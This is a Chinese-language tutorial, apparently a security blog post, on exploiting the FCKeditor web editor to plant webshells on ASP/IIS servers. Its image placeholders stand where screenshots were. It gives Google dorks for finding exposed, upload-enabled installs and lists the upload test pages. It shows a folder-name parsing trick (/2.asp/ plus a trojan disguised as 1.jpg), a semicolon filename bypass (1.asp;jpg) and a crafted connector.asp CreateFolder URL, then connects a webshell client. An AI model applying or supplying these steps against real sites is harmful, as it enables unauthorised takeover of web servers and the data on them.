Fckeditor编辑器漏洞利用

1、查看版本
Fckeditor/_whatsnew.html

f1

2、查看ConfigIsEnabled 属性,决定是否可以上传文件
(1)ConfigIsEnabled = False

f2

(2)ConfigIsEnabled = True

Config.asp文件重要内容:

f3

f4
小技巧:
google hacking: inurl:fckeditor -intext:”ConfigIsEnabled = False” intext:ConfigIsEnabled
Inurl:fckeditor intext:”ConfigIsEnabled = True”
3、上传地址
(1)Fckeditor/editor/filemanager/connectors/test.html

f5

(2)Fckeditor/editor/filemanager/connectors/uploadtest.html

f6

4、拿webshell

<1>路径一:Fckeditor/editor/filemanager/connectors/test.html
(1)直接Create Folder 1.asp不行,会过滤

f0

(2)在Current Folder下输入/2.asp/,然后Create Folder,输入3.asp,确定

f7

f8
上传1.jpg,写入一句话木马

f9

菜刀链接,ok

f10

<2>路径二:Fckeditor/editor/filemanager/connectors/uploadtest.html
(1)直接上传,上传文件1.asp;2.jpg会被过滤为1_asp;2.jpg无效。

f11

原因是两个 . 号,会把除最后一个点号的其他 . 号转义成 _ ,如上传文件1.asp;2.jpg;.rar.gif
得到

f12
(2)构造文件1.asp;jpg 只有一个.号,就不会过滤

f13

菜刀链接

f14

5、突破建立文件夹
就是利用之前/fckeditor/editor/filemanager/connectors/test.html下的URL命令
如下建立1.asp文件夹,里边有个2.asp
构造URL如下:
http://localhost\fckeditor\editor\filemanager\connectors\asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2F1.asp%2F&NewFolderName=2.asp
效果如下:

f15

f16
6、其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
此处采用fckeditor 2.4.3版本进行测试

f17

图片–上传

f18

f19

或者是:图像–浏览服务器

f20

Image–Create New Folder — 1.asp — 确定

f21

进入1.asp — 浏览 — 1.jpg(木马) — upload

f22

得到webshell路径

f23

您可能还喜欢...